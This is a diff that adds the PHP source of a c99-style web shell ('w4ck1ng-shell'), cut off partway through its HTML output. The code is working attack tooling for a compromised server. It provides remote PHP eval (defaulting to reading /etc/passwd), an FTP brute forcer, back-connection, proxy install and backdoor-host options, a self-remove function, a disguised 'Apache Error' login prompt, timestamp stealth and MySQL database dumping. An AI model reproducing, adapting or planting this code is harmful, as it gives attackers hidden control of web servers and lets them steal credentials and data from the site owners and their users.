+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+//removed backdoor
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+//$log_email = "synsta@gmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
